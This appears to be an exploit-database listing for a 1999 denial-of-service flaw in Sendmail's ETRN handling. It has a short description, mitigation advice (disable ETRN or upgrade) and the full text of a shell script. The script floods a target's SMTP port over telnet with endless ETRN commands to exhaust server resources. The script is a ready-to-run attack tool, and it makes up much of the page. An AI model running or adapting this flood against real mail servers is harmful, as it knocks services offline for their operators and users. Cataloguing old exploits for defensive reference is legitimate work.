header-logo
Suggest Exploit
vendor:
Sendmail
by:
lcamtuf
2.6
CVSS
LOW
Denial of Service
400
CWE
Product Name: Sendmail
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: sendmail
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Mac, Windows
1999

Low-Bandwidth Denial of Service Vulnerability in Sendmail

When a client connects to the sendmail smtpd and sends an ETRN command to the server, the server fork()s and sleeps for 5 seconds. If many ETRN commands are sent to a server, it is possible to exhaust system resources and cause a denial of service or even a reboot of the server.

Mitigation:

Disable ETRN command in Sendmail configuration, or upgrade to a version of Sendmail that is not vulnerable.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/904/info

There is a low-bandwidth dos vulnerability in Sendmail. When a client connects to the sendmail smtpd and sends an ETRN command to the server, the server fork()s and sleeps for 5 seconds. If many ETRN commands are sent to a server, it is possible to exhaust system resources and cause a denial of service or even a reboot of the server.

#!/bin/sh

TARGET=localhost
COUNT=150
SLEEP=1

echo "gurghfrbl.sh - (c) lcamtuf '99"
echo -n "Tickle"

while :; do
echo -n "."
(
NIC=0
while [ "$NIC" -lt "$COUNT" ]; do
echo "ETRN x"
done
) | telnet $TARGET 25 &>/dev/null &
sleep $SLEEP
killall -9 telnet &>/dev/null
done

Navigation

Suggest Exploit

Services By CQR